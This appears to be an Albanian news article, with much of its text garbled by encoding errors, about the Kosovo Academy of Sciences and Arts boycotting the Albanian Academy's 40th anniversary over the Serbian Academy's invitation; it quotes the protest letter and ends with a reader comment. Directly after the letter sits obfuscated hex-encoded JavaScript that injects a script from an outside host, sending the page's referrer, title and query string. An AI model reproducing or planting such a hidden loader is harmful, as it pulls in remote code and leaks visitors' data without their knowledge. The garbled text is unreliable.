f1_14ashak1352884318

Ftesa pA�r SerbinA� la ASHAK-un pa shkuar nA� pA�rvjetorin e AkademisA� sA� ShqipA�risA�

Ftesa qA� i A�shtA� bA�rA� AkademisA� Serbe tA� Shkencave dhe e Arteve pA�r tA� marrA� pjesA� nA� kremtimin e 40-vjetorit tA� AkademisA� sA� Shkencave tA� ShqipA�risA�, ka bA�rA� qA� Akademia e Shkencave dhe Arteve tA� KosovA�s tA� mos marrA� pjesA� nA� kA�tA� kremtimin. NA� kA�tA� festim tA� t hA�nA�n ishte prezent nA�nkryetari i AkademisA� Serbe, Lubisha Rakiq.

ASHAK pA�rmes njA� letre kishte paralajmA�ruar AkademinA� e Shkencave tA� ShqipA�risA� mA� 29. 10. 2012:

a�?KA�to ditA� mA�suam se nA� kremtimin e 40-vjetorit tA� AkademisA� sA� Shkencave tA� ShqipA�risA� ishte ftuar edhe Akademia Serbe e Shkencave dhe e Arteve. A�shtA� punA� e juaja se kA� e ftoni, por duke marrA� parasysh rolin e AkademisA� Serbe nA� pA�rpilimin e suazave a�?shkencorea�? dhe ideologjike nA� nxitjen e dhunA�s dhe tA� gjakderdhjes masive deri te gjenocidi i hapur ndaj shqiptarA�ve, kroatA�ve, boshnjakA�ve etj., Akademia jonA� nuk e ka pritur mirA� kA�tA� ftesA�.

Akademia Serbe nA� vitin 1986 ka hartuar projektin famA�keq, me emrin a�?Memorandum SANUa�?, si platformA� kryesore nA� tA� cilA�n u mbA�shtet Millosheviqi nA� ndA�rmarrjen e masave represive dhe zhvillimin e luftA�rave tA� pA�rgjakshme nA� ish-Jugosllavi, veA�anA�risht ndaj shqiptarA�ve qA� nga viti 1987. AnA�tar i ekipit tA� kA�tij a�?Memorandumita�? ishte edhe nA�nkryetari i sotA�m i AkademisA� Serbe, akademik Lubisha Rakiqi, i cili, siA� morA�m vesh, e ka paralajmA�ruar ardhjen nA� pA�rvjetorin e AkademisA� suaj. PA�r shkak tA� kA�tij projekti, nga i cili kjo Akademi ende nuk A�shtA� distancuar, ajo mbeti e izoluar deri vonA� nga asociacionet e akademive evropiane, por dhe nga disa akademi tA� ish-JugosllavisA�, tA� cilat edhe sot nuk e ftojnA� nA� asnjA� takim. Vitin e kaluar Akademia Kroate e Shkencave dhe e Arteve, pA�r shkak tA� kA�tij a�?Memorandumia�? nuk e ftoi AkademinA� Serbe, madje as atA� Malazeze, nA� 150-vjetorin e themelimit tA� saj. Dhe kA�tA� fakt e keni ditur edhe ju z. Kryetar.

E pakA�naqur me kA�tA� hap, udhA�heqja e AkademisA� sA� Shkencave dhe tA� Arteve tA� KosovA�s nuk do tA� marrA� pjesA� nA� kA�tA� pA�rvjetor tA� AkademisA� suaja�?, thuhet nA� mes tjerash nA� letrA�n e nA�nshkruar nga kryetari i AkademisA� sA� Shkencave dhe tA� Arteve tA� KosovA�s, akademik Hivzi Islami.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

  • Lulja

    Nese ASHSH ndjek kete rruge, pas ca dekadash akademiket shqiptare mund te zgjedhin nese ndjehen serbe ose greke, sepse ASH e Serbise kete ka ne platformen e saj.